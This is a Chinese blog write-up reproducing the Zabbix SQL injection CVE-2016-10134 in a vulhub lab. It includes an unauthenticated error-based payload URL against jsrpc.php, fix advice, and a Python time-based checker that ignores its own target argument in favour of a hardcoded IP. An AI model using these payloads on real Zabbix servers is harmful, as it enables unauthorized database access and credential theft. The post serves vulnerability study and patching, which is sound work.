zabbix SQL注入漏洞 (CVE-2016-10134)

最新推荐文章于 2025-04-03 15:12:59 发布
最新推荐文章于 2025-04-03 15:12:59 发布
阅读量4.9k 收藏
点赞数 1
分类专栏: 漏洞复现
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_44159028/article/details/114396747
版权
本文分析了Zabbix中jsrpc.php页面存在的SQL注入漏洞,包括漏洞描述、环境搭建、复现过程及修复建议,并提供了漏洞检测脚本。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

目录

一. 漏洞描述

二. 环境搭建

三. 漏洞复现

四. 漏洞修复

五. 漏洞检测脚本

一. 漏洞描述

        zabbix是一个基于WEB界面的提供分布式系统监视以及网络监视功能的企业级的开源解决方案。Zabbix 的latest.php中的toggle_ids[]和jsrpc.php种的profieldx2参数存在sql注入,通过sql注入获取管理员账户密码,进入后台,进行getshell操作。这里就介绍jsrpc.php页中的sql注入

影响版本:zabbix 2.2.x,3.03-3.3.0

二. 环境搭建

利用vulhub进行漏洞环境的搭建

访问 8080

三. 漏洞复现

poc: http://your-ip:8080/jsrpc.php?type=0&mode=1&method=screen.get&profileIdx=web.item.graph&resourcetype=17&profileIdx2=updatexml(0,concat(0xa,user()),0)

无需登录,直接访问。获取用户名为root

获取数据库

四. 漏洞修复

1.  禁用Guest账户,关闭无用账户。
2.  升级zabbix版本。

五. 漏洞检测脚本

#author:xcc
import requests
import argparse
import os
def url():
		parser = argparse.ArgumentParser(description='zabbix SQL注入漏洞(CVE-2016-10134)POC')
		parser.add_argument('target_url',type=str,help='The target address,example: http://192.168.140.153:8080')
		args = parser.parse_args() 
		global url
		url = args.target_url
		#检测输入的url的正确性
		if url.startswith('http://') or url.startswith('https://'):
			pass
		else:
			print('[-]Please include http:// or https:// in the URL!!')
			os._exit(0)
		if url.endswith('/'):
			url = url[:-1]
		print('[+]author:chenchen')
		print("[-]zabbix SQL注入漏洞(CVE-2016-10134)POC",)
		print("[-]开始执行检测...")
		print("[-]目标地址:",url)
		return url
def poc():
	headers={
		'User-Agent':'Mozilla/5.0 (Linux; Android 6.0; Nexus 5 Build/MRA58N) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.75 Mobile Safari/537.36'
	}
	poc1 = '/jsrpc.php?type=0&mode=1&method=screen.get&profileIdx=web.item.graph&resourcetype=17&profileIdx2=sleep(1)'
	poc2 = '/jsrpc.php?type=0&mode=1&method=screen.get&profileIdx=web.item.graph&resourcetype=17&profileIdx2=sleep(2)'
	url = 'http://192.168.1.5:8080'
	url_1 = url + poc1
	url_2 = url + poc2
	try:
		time1= requests.get(url=url_1,headers=headers).elapsed.total_seconds()
		time2= requests.get(url=url_2,headers=headers).elapsed.total_seconds()
		if time1 >= 2 and time2 >= 4:
			print('漏洞存在')
		else:
			print('漏洞不存在')
	except:
		print('发生错误')
if __name__ == '__main__':
	url()
	poc()

 

——心,若没有栖息的地方,到哪都是流浪

 

[ vulhub漏洞复现篇 ] zabbix SQL注入漏洞CVE-2016-10134
qq_51577576的博客
08-14 4843
👨‍🎓 博主介绍:大家好,我是,很高兴认识大家~✨主攻领域:【渗透领域】【数据通信】 【通讯安全】 【web安全】【面试分析】🎉欢迎关注💗一起学习👍一起讨论⭐️一起进步📝文末有彩蛋🙏作者水平有限,欢迎各位大佬指点,相互学习进步!......
漏洞复现】Zabbix SQL注入漏洞 - CVE-2024-42327
总有人间一两风,填我十万八千梦
12-06 3019
Zabbix 前端上具有默认用户角色或具有提供 API 访问权限的任何其他角色的非管理员用户帐户可以利用此漏洞SQLi 存在于 CUser 类的 addRelatedObjects 函数中,该函数是从 CUser.get 函数调用的,每个具有 API 访问权限的用户都可以使用该函数。
Zabbix sql注入漏洞(CVE-2016-10134)
m0_65150886的博客
12-27 1172
zabbix是一个基于WEB界面的提供分布式系统监视以及网络监视功能的企业级的开源解决方案。Zabbix 的latest.php中的toggle idsI或isrpc.php种的profieldx2参数存在sql注入,通过sql注入获取管理员账户密码,进入后台,进行getshel操作。3.登录后,查看Cookie中的zbx_sessionid,复制后16位字符。6.利用jsrpc的profileIdx2参数sql注入获取用户名和密码。5.在攻击机访问的zabbix的地址后面加上如下url。
漏洞复现Zabbix SQL注入漏洞(CVE-2025-42327),从零基础到精通,收藏这篇就够了!
最新发布
Libra1313的博客
04-03 1168
企业级的分布式监控解决方案,监控各种IT资源,从服务器到网络设备,再到应用程序和服务,无所不能!但是,再厉害的管家也有疏忽的时候,这不,Zabbix前端上默认用户或者其他拥有API访问权限的角色,就可能被这个名为CVE-2024-42327的SQL注入漏洞给钻了空子!罪魁祸首就是addRelatedObjects 函数中的 CUser 类,它被 CUser.get 函数调用,而每个拥有 API 访问权限的用户都能访问这个函数,简直是防不胜防!因篇幅有限,仅展示部分资料,需要点击下方链接即可前往获取。
Zabbix sql注入漏洞复现(CVE-2016-10134
whojoe的博客
06-06 3825
Zabbix sql注入漏洞复现(CVE-2016-10134)环境搭建 环境搭建 zabbix 2.2.x, 3.0.0-3.0.3版本存在SQL注入漏洞,攻击者无需授权登陆即可登陆zabbix管理系统 启动docker systemctl start docker 下载vulhub git clone --depth=1 https://github.com.cnpmjs.org/vulhub/vulhub.git 进入对应目录 cd vulhub/zabbix/CVE-2016-10134/ 启
zabbix latest.php SQL注入漏洞CVE-2016-10134
黑白的博客
12-23 316
声明 好好学习,天天向上 漏洞描述 zabbix是一款服务器监控软件,其由server、agent、web等模块组成,其中web模块由PHP编写,用来显示数据库中的结果。 影响范围 2.2.x 3.3.0-3.03 复现过程 这里使用3.0.3版本 使用vulhub /app/vulhub-master/zabbix/CVE-2016-10134 使用docker启动 docker-compose build docker-compose up -d 环境启动后,访问 http://192.168.
zabbix-latest.php-SQL注入漏洞(CVE-2016-10134)
m0_51186260的博客
06-21 1124
zabbix-latest.php-SQL注入漏洞
Zabbix SQL注入漏洞CVE-2024-42327修复建议
拉丁解牛技术专栏
02-05 364
Zabbix官方修复了Zabbix SQL注入漏洞(CVE-2024-42327)。利用该漏洞,具有API访问权限的用户可越权访问高权限用户敏感信息以及执行恶意SQL语句。
Zabbix SQL注入CVE-2016-10134
qq_23003811的博客
07-18 422
zabbix是一个基于WEB界面的提供分布式系统监视以及网络监视功能的企业级的开源解决方案。Zabbix 的latest.php中的toggle idsI或isrpc.php种的profieldx2参数存在sql注入。3、发现注入点profileIdx、profileIdx2。2、sqlmap跑注入点。
zabbix SQL注入漏洞CVE-2016-10134
jammny
12-04 481
漏洞详情 zabbix是一款服务器监控软件,其由server、agent、web等模块组成,其中web模块由PHP编写,用来显示数据库中的结果。前端页面jsrpc.php的参数profileIdx2以及后端latest.php页面中的参数toggle_ids[]存在SQL注入,攻击者可以通过此漏洞 漏洞影响 Zabbix 2.2.14之前 Zabbix 3.0~3.0.4 漏洞利用 如果可以使用guest用户进行登陆,那么可以通过账号为guest密码为空进入后台,通过抓包记住自己cookie
漏洞复现----26、Zabbix latest.php SQL注入漏洞CVE-2016-10134
七天
06-28 817
一、Zabbix概述 Zabbix 是一个企业级分布式开源监控解决方案。Zabbix 软件能够监控众多网络参数和服务器的健康度、完整性。 Zabbix由以下组件组成: 1、Server:Zabbix server 是 Zabbix软件的核心组件,agent 向其报告可用性、系统完整性信息和统计信息。server也是存储所有配置信息、统计信息和操作信息的核心存储库。 2、数据库:所有配置信息以及 Zabbix 采集到的数据都被存储在数据库中。 3、Web 界面为了从任何地方和任何平台轻松访问 Zabbix
BUU一血![Zabbix]CVE-2016-10134
qq_43801002的博客
04-25 1031
zabbixzabbix([`zæbiks])是一个基于WEB界面的提供分布式系统监视以及网络监视功能的企业级的开源解决方案。 zabbix能监视各种网络参数,保证服务器系统的安全运营;并提供灵活的通知机制以让系统管理员快速定位/解决存在的各种问题。 zabbix由2部分构成,zabbix server与可选组件zabbix agent。 zabbix server可以通过SNMP,zabbi...
Zabbixcve-2016-10134漏洞复现
hh27644607523的博客
06-26 232
登录之后查看cookie中的zbx_sessionid并复制后16位。拉取镜像docker-compose up -d。也可以通过jsrpc.php触发,且无需登录。使用guest账号登录无需密码。将后16位作为值拼接访问。访问ip 8080端口。
Zabbix sql最新注入漏洞及其利用探讨
weixin_44023460的博客
12-09 3615
simeon 在企业和个人安全意识不断增强,对有安全防护的企业来说,渗透比过去相对困难一些,而一些对硬件、资产等管理平台仍然存在弱口令等漏洞,一旦通过这些漏洞打开入口,将对企业安全造成巨大的威胁。Zabbix 是用得非常广泛的网络监测软件,其存在sql注入,声称可以获取管理员密码,虽然Zabbix 3.0.3以下版本存在漏洞,但如何利用,如何测试,您掌握了吗?本文带您实测Zabbix 漏洞,掌握其...
Zabbix SQL注入漏洞分析
若有战,召必回
01-07 1095
漏洞简介Zabbix 是一款开源的网络监控和报警系统,用于监视网络设备、服务器和应用程序的性能和可用性。攻击者可以通过API接口,向 user.get API端点发送恶意构造的请求,注入SQL代码,以实现权限提升、数据泄露或系统入侵。影响版本环境搭建参考https://forum.butian.net/share/3056访问https://cdn.zabbix.com/zabbix/appliances/stable/7.0/7.0.0/
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Ly4j

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值